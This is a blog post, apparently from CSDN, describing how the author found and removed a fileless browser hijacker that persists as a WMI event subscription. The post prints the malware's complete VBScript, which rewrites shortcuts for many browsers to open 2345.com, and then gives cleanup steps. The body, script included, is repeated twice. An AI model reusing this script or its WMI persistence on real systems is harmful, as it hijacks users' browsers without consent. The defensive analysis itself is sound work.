Chrome被hao123.com等恶意链接劫持真正解决方法
2017-05-18 09:13
1106 查看
某日,因想下载verycd.com的资源,搜索到一个verycd链接查看器(具体原因不表,你懂),结果就真得吃了苍蝇了!……
既无法查到下载链接,直接将之删除。然而发现,再打开浏览器就被直接跳转到 http://www.2345.com/页面了,而且打开多个浏览器:Chrome, Firefox, Opera, Safari,
iexplorer, maxthon,均相同症状,检查浏览器首页设置——均正常!
最后发现,原来快速启动栏的快捷命令被其修改,修改后的类似如下:
“C:\Program Files (x86)\Mozilla Firefox\firefox.exe” http://www.2345.com/?kunown
于是认为就是普通的修改快捷方式,手工删除“http://www.2345.com/?kunown”部分。但好景不长,半小时后再次被更改了,这才认定——系统被蛀了~!
本机安装有norton,未检出问题。
又安装了超级兔子、360、exterminateit等工具进行检查,也未检出……,果断将其全部卸载……(超级兔子卸载后发现还留有其自带浏览器垃圾未删除!!!真够垃圾~!手工将其卸载,不多赘述!)
打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改win7下opera快速启动图标路径类似如下:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet\Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
![](http://img.blog.csdn.net/20170518091533947?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。
要查看WMI事件,到以下地址下载WMITool并安装,
链接:http://pan.baidu.com/s/1hrO5T32 密码:s69f
安装后打开WMI event viewer,点击左上角regist er for events,弹出Connect to
namespace框,填入“root\subscription”,(或者默认的那个进去/root/CIMV2)确定,出现下图:
![](http://img.blog.csdn.net/20170518091000935?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
点击左侧_EventFilter:Name=”unown_filter”,再至右侧右键点击ActiveScriptEventConsumer
Name=”unown”,选择view instant properties,如下图:
![](http://img.blog.csdn.net/20170518091030928?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvc2hvdWxkbm90YXBwZWFyY2FsbQ==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!
受到影响的浏览器有(各色浏览器,差不多齐了):
“IEXPLORE.EXE”, “chrome.exe”,
“firefox.exe”, “360chrome.exe”, “360SE.exe”, “SogouExplorer.exe”,
“opera.exe”, “Safari.exe”, “Maxthon.exe”, “TTraveler.exe”,
“TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”,
“QQBrowser.exe”
具体代码如下:
On Error Resume Next:Const link =
“http://www.2345.com/?kunown”:browsers = Array(“IEXPLORE.EXE”,
“chrome.exe”, “firefox.exe”, “360chrome.exe”, “360SE.exe”,
“SogouExplorer.exe”, “opera.exe”, “Safari.exe”, “Maxthon.exe”,
“TTraveler.exe”, “TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”,
“QQBrowser.exe”):Set oDic =
CreateObject(“scripting.dictionary”):For Each browser In
browsers:oDic.Add LCase(browser), browser:Next:Set fso =
CreateObject(“Scripting.Filesystemobject”):Set WshShell =
CreateObject(“Wscript.Shell”):strDesktop =
“C:\Users\Gemini\Desktop”:strAllUsersDesktop =
WshShell.SpecialFolders(“AllUsersDesktop”):QuickLaunch =
“C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick
Launch”:UserPinnedStartMenu = QuickLaunch & “\User
Pinned\StartMenu”:UserPinnedTaskBar = QuickLaunch &
“\User Pinned\TaskBar”:For Each file In
fso.GetFolder(strDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:For Each file In
fso.GetFolder(strAllUsersDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:If
fso.FolderExists(QuickLaunch) Then:For Each file In
fso.GetFolder(QuickLaunch).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedStartMenu) Then:For Each file In
fso.GetFolder(UserPinnedStartMenu).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedTaskBar) Then:For Each file In
fso.GetFolder(UserPinnedTaskBar).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If
最后,清除方法:在WMI event
viewer中将“_EventFilter:Name=”unown_filter””项目右键删除!
删不掉?
到WMITool安装路径(例如:C:\Program Files
(x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
嗯,好歹这苍蝇到底还是吐出去了!
既无法查到下载链接,直接将之删除。然而发现,再打开浏览器就被直接跳转到 http://www.2345.com/页面了,而且打开多个浏览器:Chrome, Firefox, Opera, Safari,
iexplorer, maxthon,均相同症状,检查浏览器首页设置——均正常!
最后发现,原来快速启动栏的快捷命令被其修改,修改后的类似如下:
“C:\Program Files (x86)\Mozilla Firefox\firefox.exe” http://www.2345.com/?kunown
于是认为就是普通的修改快捷方式,手工删除“http://www.2345.com/?kunown”部分。但好景不长,半小时后再次被更改了,这才认定——系统被蛀了~!
本机安装有norton,未检出问题。
又安装了超级兔子、360、exterminateit等工具进行检查,也未检出……,果断将其全部卸载……(超级兔子卸载后发现还留有其自带浏览器垃圾未删除!!!真够垃圾~!手工将其卸载,不多赘述!)
打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改win7下opera快速启动图标路径类似如下:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet\Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。
要查看WMI事件,到以下地址下载WMITool并安装,
链接:http://pan.baidu.com/s/1hrO5T32 密码:s69f
安装后打开WMI event viewer,点击左上角regist er for events,弹出Connect to
namespace框,填入“root\subscription”,(或者默认的那个进去/root/CIMV2)确定,出现下图:
点击左侧_EventFilter:Name=”unown_filter”,再至右侧右键点击ActiveScriptEventConsumer
Name=”unown”,选择view instant properties,如下图:
查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中),靠~!
受到影响的浏览器有(各色浏览器,差不多齐了):
“IEXPLORE.EXE”, “chrome.exe”,
“firefox.exe”, “360chrome.exe”, “360SE.exe”, “SogouExplorer.exe”,
“opera.exe”, “Safari.exe”, “Maxthon.exe”, “TTraveler.exe”,
“TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”,
“QQBrowser.exe”
具体代码如下:
On Error Resume Next:Const link =
“http://www.2345.com/?kunown”:browsers = Array(“IEXPLORE.EXE”,
“chrome.exe”, “firefox.exe”, “360chrome.exe”, “360SE.exe”,
“SogouExplorer.exe”, “opera.exe”, “Safari.exe”, “Maxthon.exe”,
“TTraveler.exe”, “TheWorld.exe”, “baidubrowser.exe”, “liebao.exe”,
“QQBrowser.exe”):Set oDic =
CreateObject(“scripting.dictionary”):For Each browser In
browsers:oDic.Add LCase(browser), browser:Next:Set fso =
CreateObject(“Scripting.Filesystemobject”):Set WshShell =
CreateObject(“Wscript.Shell”):strDesktop =
“C:\Users\Gemini\Desktop”:strAllUsersDesktop =
WshShell.SpecialFolders(“AllUsersDesktop”):QuickLaunch =
“C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick
Launch”:UserPinnedStartMenu = QuickLaunch & “\User
Pinned\StartMenu”:UserPinnedTaskBar = QuickLaunch &
“\User Pinned\TaskBar”:For Each file In
fso.GetFolder(strDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:For Each file In
fso.GetFolder(strAllUsersDesktop).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:If
fso.FolderExists(QuickLaunch) Then:For Each file In
fso.GetFolder(QuickLaunch).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedStartMenu) Then:For Each file In
fso.GetFolder(UserPinnedStartMenu).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If:If
fso.FolderExists(UserPinnedTaskBar) Then:For Each file In
fso.GetFolder(UserPinnedTaskBar).Files:If
LCase(fso.GetExtensionName(file.Path)) = “lnk” Then:set oShellLink
= WshShell.CreateShortcut(file.Path):path =
oShellLink.TargetPath:name = fso.GetBaseName(path)
& “.” &
fso.GetExtensionName(path):If oDic.Exists(LCase(name))
Then:oShellLink.Arguments = link:If file.Attributes And 1
Then:file.Attributes = file.Attributes - 1:End
If:oShellLink.Save:End If:End If:Next:End If
最后,清除方法:在WMI event
viewer中将“_EventFilter:Name=”unown_filter””项目右键删除!
删不掉?
到WMITool安装路径(例如:C:\Program Files
(x86)\WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!
还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!
暂时就这么多了,还有没有其它影响的话,用用再看吧!
嗯,好歹这苍蝇到底还是吐出去了!
相关文章推荐
- 6_Win7下Chrome主页被流氓网站hao123.com劫持后的解决方法。
- 电信、网通、联通等恶意DNS劫持跳广告页面的解决方法
- Win8 下点击链接调用Google Chrome出现Chrome is unresponsive, relaunch now的解决方法
- win10系统打开chrome主页会被hao123劫持的故障原因及解决方法
- 关于锚点页内链接跳转出现问题(不响应,没有反应)的解决方法(ZT)
- IIS5中文链接无法打开解决方法(转)
- 非中文操作系统下正常打开有中文链接的CHM文件解决方法!!!
- 解决IE被恶意修改方法总结
- IIS5中文链接无法打开解决方法
- jdbc链接oracle 11g时, 会报ora-01017的错误的解决方法
- IE主页被恶意网站修改的解决方法
- FootStep 8、VC6下进行Symbian开发时,非代码问题引起的编译及链接出错的解决方法
- [导入]关于Gmail无法链接的解决方法。
- 一个自己写的真正判断文件格式,文件大小,而并不仅仅从扩展名来进行判断的上传方法,进一步加强防止软件或恶意的木马图片上传
- emapicn.exe,winpac.exe恶意插件疯弹广告解决方法
- 【解决方法】Windows 2000\Windows 2003终端服务器超出最大允许链接数
- IIS5中文链接无法打开解决方法
- [转]IE点击链接没有反应或打开新窗口出现一个空白框(地址栏空白)的解决方法
- 恶意网站http://www.chaxun.com,近日不断受到这个无耻网站的弹出广告骚扰(已找到解决方法)
- 解决IE被恶意修改方法总结